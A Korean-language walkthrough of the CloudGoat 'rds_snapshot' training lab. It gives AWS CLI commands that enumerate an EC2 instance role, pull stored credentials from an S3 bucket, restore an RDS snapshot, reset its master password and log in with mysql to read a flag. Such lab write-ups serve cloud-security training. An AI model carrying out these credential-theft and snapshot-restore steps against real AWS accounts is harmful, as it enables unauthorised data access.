시나리오 목표
RDS snapshot에 포함되어 있는 flag 탈취
시나리오 세팅
./cloudgoat.py create rds_snapshot
EC2 인스턴스 1대의 Public IP와 접근할 SSH 키 페어 파일과 command가 주어지며 시작된다.
Solution
1. 초기 환경 탐색
시작과 함께 주어진 인스턴스로 먼저 접속한 뒤, 연결된 Credential 등을 먼저 확인한다.
확인 결과, 인스턴스에 IAM Role이 연결되어있음을 확인할 수 있었다.
이어서 해당 Role의 권한을 확인해보았다. 그 결과 S3 서비스에 대한 모든 작업을 할 수 있다는 점을 발견할 수 있었다.
# Role에 연결된 Policy 목록
aws iam list-role-policies --role-name cg-ec2-admin-role
# Role에 연결된 Policy의 내용 확인
aws iam get-role-policy --role-name cg-ec2-admin-role --policy-name cg-ec2-admin-policy
2. S3 버킷 탐색 및 Credential 탈취
이어서 s3 버킷 목록 중 시나리오에서 사용할 버킷을 확인하고, 내부에서 파일을 탈취할 수 있었다.
해당 파일에서 또 다른 장기 Credential을 획득할 수 있었다.
그리고 해당 Credential을 확인한 결과, RDS와 관련된 일부 작업을 할 수 있는 것을 확인할 수 있다.
# IAM User에 연결된 Policy 목록
aws iam list-user-policies --user-name [IAM User name] --profile theft
# IAM User에 연결된 Policy 내용 확인
aws iam get-user-policy --user-name [IAM User name] --policy-name [policy명] --profile theft
3. RDS 확인
이제 버킷 object에서 탈취한 Credential로 RDS 관련 정보를 탐색해본다.
# RDS 인스턴스 내역 및 정보 확인
aws rds describe-db-instances (--db-instance-identifier) --profile theft
# RDS 스냅샷 내역 및 정보 확인
aws rds describe-db-snapshots (--db-instance-identifier) --profile theft
탐색 결과, 하나의 RDS가 Active한 상황이고, 그 RDS에 대해 스냅샷이 하나 생성되어있는 것을 알 수 있다.
{
"DBInstances": [
{
"DBInstanceIdentifier": "cg-rds",
"DBInstanceClass": "db.t3.micro",
"Engine": "mysql",
"DBInstanceStatus": "available", # 해당 DB가 활성화된 상태
"MasterUsername": "cgadmin",
"Endpoint": {
"Address": "cg-rds.c9q4mm84odmh.us-east-1.rds.amazonaws.com",
"Port": 3306,
"HostedZoneId": "Z2R2ITUGPM61AM"
},
...
{
"DBSnapshots": [
{
"DBSnapshotIdentifier": "cg-rds-snapshot",
"DBInstanceIdentifier": "cg-rds", # cg-rds DB인스턴스의 snapshot
"SnapshotCreateTime": "2024-08-01T07:28:37.637Z",
"Engine": "mysql",
"AllocatedStorage": 20,
"Status": "available", # snapshot을 사용할 수 있는 상태
"Port": 3306,
...
}
]
}
4. RDS 스냅샷 백업 및 조정
문제 내용에 따르면 시나리오 타깃은 RDS 스냅샷에 존재하는 flag이다. 그리고 버킷에서 탈취한 계정의 권한으로 RDS 스냅샷을 복원할 수 있다. (rds:RestoreDBInstanceFromDBSnapshot)
그러므로 이 스냅샷을 복구한 뒤, Master Password를 임의로 변경해 우리가 접속할 수 있도록 해야할 것이다.
아래 커맨드를 통해 스냅샷에서 DB를 복구한다.
복구될 DB는 기존에 활성화된 DB와 동일한 Subnet과 SG를 갖도록 설정해주어 우리가 지금 접속해있는 인스턴스에서 접근할 수 있도록 하자 (혹은 `--publicly-accessible`)
aws rds restore-db-instance-from-db-snapshot \
--db-instance-identifier [DB Identifier, 새로운 이름으로 임의 지정]
--db-snapshot-identifier [snapshot Identifier]
--db-subnet-group-name [DB가 배치될 subnet group]
--vpc-security-group-ids [DB인스턴스에 연결될 SG]
--profile theft
스냅샷으로 복구된 DB 인스턴스가 활성화(available)되기 까지 대기한다.
aws rds describe-db-instances \
--db-instance-identifier [스냅샷복구한 DB identifier] \
--query "DBInstances[].DBInstanceStatus"
--profile theft
스냅샷 DB가 활성화된 다음, 이 DB에 접속하기 위해 Master Password를 변경한다.
aws rds modify-db-instance \
--db-instance-identifier [복구한 DB identifier] \
--master-user-password [변경할 password] \
--apply-immediately \
--profile theft
5. Flag 탈취
Password 변경 분까지 적용 완료된 뒤, DB의 host와 Password를 바탕으로 DB에 접속한다.
mysql -u cgadmin -h [스냅샷DB의 host] -P 3306 -p
DB의 테이블에서 Flag를 획득할 수 있다.